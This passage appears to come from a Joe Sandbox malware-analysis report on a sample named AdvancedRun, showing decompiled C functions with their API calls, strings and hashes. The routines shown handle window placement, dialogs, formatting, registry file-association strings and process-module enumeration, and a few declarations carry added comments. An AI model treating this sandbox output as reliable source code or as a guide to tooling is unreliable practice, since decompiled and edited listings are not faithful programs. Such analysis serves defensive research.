                                                                  						}
                                                                  					}
                                                                  					_t24 = E00406025(_t31,  &_a48);
                                                                  					_pop(_t36);
                                                                  					goto L10;
                                                                  					L12:
                                                                  					_t42 = _t42 + 1;
                                                                  				} while (_t42 < _t34);
                                                                  				goto L13;
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                  • String ID: 0$6
                                                                  • API String ID: 2029023288-3849865405
                                                                  • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                  • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                  • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E00402BEE(void* __ebx) {
                                                                  				int _v8;
                                                                  				int _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				int _v24;
                                                                  				int _v28;
                                                                  				void* _t27;
                                                                  				int _t31;
                                                                  				void* _t34;
                                                                  				int _t37;
                                                                  				int _t38;
                                                                  				int _t41;
                                                                  				int _t50;
                                                                  
                                                                  				_t34 = __ebx;
                                                                  				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
                                                                  					return _t27;
                                                                  				} else {
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					asm("movsd");
                                                                  					_v8 = GetSystemMetrics(0x4e);
                                                                  					_v12 = GetSystemMetrics(0x4f);
                                                                  					_t41 = GetSystemMetrics(0x4c);
                                                                  					_t31 = GetSystemMetrics(0x4d);
                                                                  					if(_v8 == 0 || _v12 == 0) {
                                                                  						_v8 = GetSystemMetrics(0);
                                                                  						_v12 = GetSystemMetrics(1);
                                                                  						_t41 = 0;
                                                                  						_t31 = 0;
                                                                  					} else {
                                                                  						_v8 = _v8 + _t41;
                                                                  						_v12 = _v12 + _t31;
                                                                  					}
                                                                  					_t50 = _v20 - _v28;
                                                                  					if(_t50 > 0x14) {
                                                                  						_t38 = _v24;
                                                                  						_t37 = _v16 - _t38;
                                                                  						if(_t37 > 0x14 && _v20 > _t41 + 5) {
                                                                  							_t31 = _t31 + 0xfffffff6;
                                                                  							if(_t38 >= _t31) {
                                                                  								_t31 = _v28;
                                                                  								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
                                                                  									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					return _t31;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00402C1C
                                                                  • GetSystemMetrics.USER32 ref: 00402C23
                                                                  • GetSystemMetrics.USER32 ref: 00402C2A
                                                                  • GetSystemMetrics.USER32 ref: 00402C30
                                                                  • GetSystemMetrics.USER32 ref: 00402C47
                                                                  • GetSystemMetrics.USER32 ref: 00402C4E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Window
                                                                  • String ID:
                                                                  • API String ID: 1155976603-0
                                                                  • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                  • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                  • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004036D5(void* __edi, void* __eflags) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				char* _v24;
                                                                  				char _v28;
                                                                  				char* _v48;
                                                                  				intOrPtr _v56;
                                                                  				intOrPtr _v60;
                                                                  				int _v64;
                                                                  				int _v72;
                                                                  				intOrPtr _v76;
                                                                  				wchar_t* _v80;
                                                                  				intOrPtr _v84;
                                                                  				int _v92;
                                                                  				char* _v96;
                                                                  				intOrPtr _v104;
                                                                  				struct tagOFNA _v108;
                                                                  				void _v634;
                                                                  				long _v636;
                                                                  				void _v2682;
                                                                  				char _v2684;
                                                                  				void* __ebx;
                                                                  				char _t37;
                                                                  				intOrPtr _t38;
                                                                  				int _t46;
                                                                  				signed short _t54;
                                                                  
                                                                  				_v636 = 0;
                                                                  				memset( &_v634, 0, 0x208);
                                                                  				_v2684 = 0;
                                                                  				memset( &_v2682, 0, 0x7fe);
                                                                  				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
                                                                  				_v12 = _t37;
                                                                  				_t38 =  *0x40cbf0; // 0x67
                                                                  				_v8 = _t38;
                                                                  				_v28 = E00405B81(0x227);
                                                                  				_v24 = L"*.cfg";
                                                                  				_v20 = E00405B81(0x228);
                                                                  				_v16 = L"*.*";
                                                                  				E00405236( &_v2684,  &_v28);
                                                                  				_t54 = 0xa;
                                                                  				_v60 = E00405B81(_t54);
                                                                  				_v104 =  *((intOrPtr*)(__edi + 0x10));
                                                                  				_v48 =  &_v12;
                                                                  				_v96 =  &_v2684;
                                                                  				_v108 = 0x4c;
                                                                  				_v92 = 0;
                                                                  				_v84 = 1;
                                                                  				_v80 =  &_v636;
                                                                  				_v76 = 0x104;
                                                                  				_v72 = 0;
                                                                  				_v64 = 0;
                                                                  				_v56 = 0x80806;
                                                                  				_t46 = GetSaveFileNameW( &_v108);
                                                                  				if(_t46 != 0) {
                                                                  					wcscpy( &_v636, _v80);
                                                                  					return E0040365E(__edi, 1,  &_v636);
                                                                  				}
                                                                  				return _t46;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 004036F6
                                                                  • memset.MSVCRT ref: 00403712
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                    • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                    • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                    • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                    • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                  • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                  • wcscpy.MSVCRT ref: 004037C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                  • String ID: L$cfg
                                                                  • API String ID: 275899518-3734058911
                                                                  • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                  • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                  • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
                                                                  				struct _SYSTEMTIME _v20;
                                                                  				long _v276;
                                                                  				long _v532;
                                                                  				FILETIME* _t15;
                                                                  
                                                                  				_t15 = __eax;
                                                                  				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                  					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
                                                                  						goto L5;
                                                                  					} else {
                                                                  						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
                                                                  						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
                                                                  						wcscpy(_a4,  &_v276);
                                                                  						wcscat(_a4, " ");
                                                                  						wcscat(_a4,  &_v532);
                                                                  					}
                                                                  				} else {
                                                                  					L5:
                                                                  					wcscpy(_a4, 0x40c4e8);
                                                                  				}
                                                                  				return _a4;
                                                                  			}

                                                                  APIs
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                  • wcscpy.MSVCRT ref: 00404F41
                                                                  • wcscat.MSVCRT ref: 00404F4E
                                                                  • wcscat.MSVCRT ref: 00404F5D
                                                                  • wcscpy.MSVCRT ref: 00404F71
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                  • String ID:
                                                                  • API String ID: 1331804452-0
                                                                  • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                  • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                  • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 71%
                                                                  			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                  				void _v514;
                                                                  				long _v516;
                                                                  				wchar_t* _t34;
                                                                  				signed int _t35;
                                                                  				void* _t36;
                                                                  				void* _t37;
                                                                  
                                                                  				_t34 = __edi;
                                                                  				_v516 = _v516 & 0x00000000;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				 *__edi =  *__edi & 0x00000000;
                                                                  				_t37 = _t36 + 0xc;
                                                                  				_t35 = 0;
                                                                  				do {
                                                                  					_push( *(_t35 + _a4) & 0x000000ff);
                                                                  					_push(L"%2.2X");
                                                                  					_push(0xff);
                                                                  					_push( &_v516);
                                                                  					L0040B1EC();
                                                                  					_t37 = _t37 + 0x10;
                                                                  					if(_t35 > 0) {
                                                                  						wcscat(_t34, " ");
                                                                  					}
                                                                  					if(_a8 > 0) {
                                                                  						asm("cdq");
                                                                  						if(_t35 % _a8 == 0) {
                                                                  							wcscat(_t34, L"  ");
                                                                  						}
                                                                  					}
                                                                  					wcscat(_t34,  &_v516);
                                                                  					_t35 = _t35 + 1;
                                                                  				} while (_t35 < 0x80);
                                                                  				return _t34;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$_snwprintfmemset
                                                                  • String ID: %2.2X
                                                                  • API String ID: 2521778956-791839006
                                                                  • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                  • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                  • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 42%
                                                                  			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                  				void _v514;
                                                                  				char _v516;
                                                                  				void _v1026;
                                                                  				char _v1028;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t16;
                                                                  				void* _t19;
                                                                  				intOrPtr* _t29;
                                                                  				char* _t31;
                                                                  
                                                                  				_t29 = __ecx;
                                                                  				_v516 = 0;
                                                                  				memset( &_v514, 0, 0x1fc);
                                                                  				_v1028 = 0;
                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                  				_t16 = _t29;
                                                                  				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                  					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                  				} else {
                                                                  					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                  				}
                                                                  				E00407343(_t16);
                                                                  				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                  				_t31 =  &_v516;
                                                                  				E00407250(_t31, _t19);
                                                                  				_push(_t31);
                                                                  				_push(L"<%s>\r\n");
                                                                  				_push(0xff);
                                                                  				_push( &_v1028);
                                                                  				L0040B1EC();
                                                                  				return E00407343(_t29, _a4,  &_v1028);
                                                                  			}

                                                                  APIs
                                                                  Strings
                                                                  • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                  • <%s>, xrefs: 00407DF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf
                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                  • API String ID: 3473751417-2880344631
                                                                  • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                  • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                  • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 70%
                                                                  			E00403B3C(intOrPtr _a4) {
                                                                  				void _v526;
                                                                  				char _v528;
                                                                  				void _v2574;
                                                                  				char _v2576;
                                                                  				void* __edi;
                                                                   				intOrPtr _t29;
                                                                   				intOrPtr _t37; /* registry key base pointer (_a4 + 0xa68); was used below without a declaration */
                                                                  
                                                                  				_v2576 = 0;
                                                                  				memset( &_v2574, 0, 0x7fe);
                                                                  				_v528 = 0;
                                                                  				memset( &_v526, 0, 0x208);
                                                                  				E00404AD9( &_v528);
                                                                  				_push( &_v528);
                                                                  				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                  				_push(0x3ff);
                                                                  				_push( &_v2576);
                                                                  				L0040B1EC();
                                                                  				_t37 = _a4 + 0xa68;
                                                                  				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                  				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                  				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                  				_t29 = E0040467A(_t37);
                                                                  				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                  				return _t29;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00403B5D
                                                                  • memset.MSVCRT ref: 00403B76
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00403B9F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                    • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                    • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                    • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                  • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                  • API String ID: 1832587304-479876776
                                                                  • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                  • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                  • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                  				void* _v8;
                                                                  				int _v12;
                                                                  				short _v524;
                                                                  				char _v1036;
                                                                   				void* __edi;
                                                                   				char* _t34; /* points at the local copy of the version string; was used below without a declaration */
                                                                  
                                                                  				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                  				wcscat( &_v524, _a8);
                                                                   				wcscat( &_v524, L"\\"); /* wide-string path separator; the narrow literal here was a decompiler artifact */
                                                                  				wcscat( &_v524, _a12);
                                                                  				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                  					return 0;
                                                                  				}
                                                                  				_t34 =  &_v1036;
                                                                  				E00404923(0xff,  &_v1036, _v8);
                                                                  				E004049A2(_t34, __esi);
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • wcscpy.MSVCRT ref: 0040AFD3
                                                                  • wcscat.MSVCRT ref: 0040AFE2
                                                                  • wcscat.MSVCRT ref: 0040AFF3
                                                                  • wcscat.MSVCRT ref: 0040B002
                                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                    • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                  • String ID: \StringFileInfo\
                                                                  • API String ID: 393120378-2245444037
                                                                  • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                  • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                  • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: _snwprintfwcscpy
                                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                                  • API String ID: 999028693-502967061
                                                                  • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                  • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                  • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 35%
                                                                  			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                  				void* _v0;
                                                                  				intOrPtr _v4;
                                                                  				intOrPtr _v8;
                                                                  				unsigned int _v12;
                                                                  				void* _v16;
                                                                  				char _v20;
                                                                  				char _v24;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v44;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t58;
                                                                  				void* _t59;
                                                                  				void* _t72;
                                                                  				intOrPtr _t78;
                                                                  				void _t89;
                                                                  				signed int _t90;
                                                                  				int _t98;
                                                                  				signed int _t105;
                                                                   				signed int _t106;
                                                                   				unsigned int* _t6; /* alias of &_v12 (module count); was used below without a declaration */
                                                                  
                                                                  				_t106 = _t105 & 0xfffffff8;
                                                                  				E0040B550(0x8874, __ecx);
                                                                  				_t98 = 0;
                                                                  				_a8 = 0;
                                                                  				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                  					if( *0x4101b8 != _t98) {
                                                                  						_t89 = _a4;
                                                                  						_t58 =  *0x40f83c(8, _t89);
                                                                  						_v8 = _t58;
                                                                  						if(_t58 != 0xffffffff) {
                                                                  							_v0 = 1;
                                                                  							_a560 = 0x428;
                                                                  							_t59 =  *0x40f834(_t58,  &_a560);
                                                                  							while(_t59 != 0) {
                                                                  								memset( &_a8, _t98, 0x21c);
                                                                  								_a12 = _a580;
                                                                  								_a8 = _t89;
                                                                  								wcscpy( &_a16,  &_a1096);
                                                                  								_a540 = _a576;
                                                                  								_t106 = _t106 + 0x14;
                                                                  								_a544 = _a572;
                                                                  								_a552 = 0x428;
                                                                  								if(E00409510(_a8,  &_a8) != 0) {
                                                                  									_t59 =  *0x40f830(_v16,  &_a552);
                                                                  									continue;
                                                                  								}
                                                                  								goto L18;
                                                                  							}
                                                                  							goto L18;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					_t72 = OpenProcess(0x410, 0, _a4);
                                                                  					_v0 = _t72;
                                                                  					if(_t72 != 0) {
                                                                  						_push( &_a4);
                                                                  						_push(0x8000);
                                                                  						_push( &_a2160);
                                                                  						_push(_t72);
                                                                  						if( *0x40f840() != 0) {
                                                                  							_t6 =  &_v12;
                                                                  							 *_t6 = _v12 >> 2;
                                                                  							_v8 = 1;
                                                                  							_t90 = 0;
                                                                  							if( *_t6 != 0) {
                                                                  								while(1) {
                                                                  									_a1616 = _t98;
                                                                  									memset( &_a1618, _t98, 0x208);
                                                                  									memset( &_a8, _t98, 0x21c);
                                                                  									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                  									_t106 = _t106 + 0x18;
                                                                  									_a8 = _a4;
                                                                  									_a12 = _t78;
                                                                  									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                  									E0040920A( &_v0,  &_a1600);
                                                                  									_push(0xc);
                                                                  									_push( &_v20);
                                                                  									_push(_v4);
                                                                  									_push(_v32);
                                                                  									if( *0x40f844() != 0) {
                                                                  										_a508 = _v32;
                                                                  										_a512 = _v36;
                                                                  									}
                                                                  									if(E00409510(_a8,  &_v24) == 0) {
                                                                  										goto L18;
                                                                  									}
                                                                  									_t90 = _t90 + 1;
                                                                  									if(_t90 < _v44) {
                                                                  										_t98 = 0;
                                                                  										continue;
                                                                  									} else {
                                                                  									}
                                                                  									goto L18;
                                                                  								}
                                                                  							}
                                                                  						}
